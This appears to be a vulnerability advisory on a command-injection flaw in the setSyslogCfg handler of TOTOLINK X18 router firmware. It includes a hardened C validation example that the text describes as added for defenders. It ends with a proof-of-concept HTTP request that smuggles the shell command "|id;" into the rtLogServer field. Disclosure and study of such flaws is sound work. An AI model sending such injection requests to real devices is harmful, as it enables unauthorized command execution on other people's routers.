TOTOLINK: X18 V9.1.0cu.2024_B20220329
TOTOLINK: X18 V9.1.0cu.2021_B20220326
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
In cstecgi.cgi, the rtLogEnabled and rtLogServer parameters of the setSyslogCfg handler are attacker-controllable, and the rtLogEnabled input is not checked. Setting rtLogEnabled = 1 indirectly triggers string splicing, which results in command execution when CsteSystem is called. IDA did not correctly analyze the parameters of CsteSystem.
CsteSystem comes from /usr/lib/libcscommon.so. Analysis shows that the command is ultimately executed by calling /bin/bash through execv.
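As a defender-side illustration of how a handler like setSyslogCfg can avoid this bug class, here is an added example. It is not TOTOLINK's code and is not reconstructed from the firmware; the program path /sbin/syslogd, its -R flag and the function names are assumptions. It does two things: it accepts rtLogServer only when it is an IPv4 literal or a hostname (with an optional port), so shell metacharacters such as `|` and `;` are rejected before anything runs, and it passes the accepted value as its own argv element to execv instead of splicing it into a command line that /bin/bash would re-parse.

```c
/* Added example (not TOTOLINK's code, not reconstructed from the firmware):
 * a hardened way to take a syslog-server setting from a request and act
 * on it. Two defences against the bug class described above:
 *  1. rtLogServer is accepted only if it is an IPv4 literal or a hostname
 *     (RFC 1123 label characters), with an optional ":port"; shell
 *     metacharacters such as '|' and ';' cannot get through.
 *  2. The value is never spliced into a command string handed to
 *     /bin/bash; it is passed as its own argv element to execv.
 * The program path "/sbin/syslogd" and its "-R" flag are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAX_SERVER_LEN 253 /* longest DNS name; also bounds the buffer below */

/* Return 1 if s is "host" or "host:port" with host an IPv4 dotted quad or a
 * hostname (labels of [A-Za-z0-9-] joined by '.'), else 0. */
int valid_syslog_server(const char *s)
{
    size_t i = 0, len;
    int label_len = 0;

    if (s == NULL)
        return 0;
    len = strlen(s);
    if (len == 0 || len > MAX_SERVER_LEN)
        return 0;

    /* host part */
    for (; i < len && s[i] != ':'; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            /* empty label, or label ending in '-' */
            if (label_len == 0 || s[i - 1] == '-')
                return 0;
            label_len = 0;
        } else if (isalnum(c) || c == '-') {
            if (label_len == 0 && c == '-')
                return 0; /* label starting with '-' */
            if (++label_len > 63)
                return 0;
        } else {
            return 0; /* anything else, including |;`$&()<> and whitespace */
        }
    }
    /* host must be non-empty and must not end in '.' or '-' */
    if (label_len == 0 || s[i - 1] == '-')
        return 0;

    /* optional ":port", 1..65535 */
    if (i < len) {
        long port = 0;
        int digits = 0;
        for (i++; i < len; i++) {
            if (!isdigit((unsigned char)s[i]))
                return 0;
            if (++digits > 5)
                return 0;
            port = port * 10 + (s[i] - '0');
        }
        if (digits == 0 || port < 1 || port > 65535)
            return 0;
    }
    return 1;
}

/* Apply the setting. Returns 0 when logging is disabled (nothing to run),
 * -1 when the server value is rejected or the child cannot be started,
 * otherwise the child's exit status. */
int apply_syslog_cfg(int enabled, const char *server)
{
    char remote_arg[MAX_SERVER_LEN + 1];
    pid_t pid;
    int status;

    if (!enabled)
        return 0;
    if (!valid_syslog_server(server)) {
        fprintf(stderr, "setSyslogCfg: rejected rtLogServer value\n");
        return -1;
    }
    /* copy is exact: valid_syslog_server already bounded the length */
    snprintf(remote_arg, sizeof remote_arg, "%s", server);

    /* argv vector: the server string is one argument and is never re-parsed
     * by a shell. Contrast with the unsafe pattern of formatting the value
     * into a command string and handing it to system()/popen() or bash. */
    char *const argv[] = { "/sbin/syslogd", "-R", remote_arg, NULL };

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127); /* exec failed; do not fall back to a shell */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed inputs: the report's PoC value and some legitimate servers */
    const char *inputs[] = { "|id;", "192.168.109.1", "log.example.com:514", "a..b" };
    size_t n;
    for (n = 0; n < sizeof inputs / sizeof inputs[0]; n++)
        printf("%-22s -> %s\n", inputs[n],
               valid_syslog_server(inputs[n]) ? "accepted" : "rejected");
    return 0;
}
```

The validator is deliberately an allowlist rather than a blocklist of metacharacters: a blocklist has to anticipate every shell feature, while an allowlist of hostname characters needs no knowledge of the shell at all. The execv call is the second, independent layer; even if a bad value slipped past validation, there is no shell to interpret it.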
PoC:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Origin: http://192.168.109.161
Connection: close
Referer: http://192.168.109.161/advance/syslog.html?timestamp=1667554800074
Cookie: SESSION_ID=2:1667546811:2

{"rtLogEnabled": "1","rtLogServer":"|id;","topicurl":"setSyslogCfg"}
```
Test screenshot: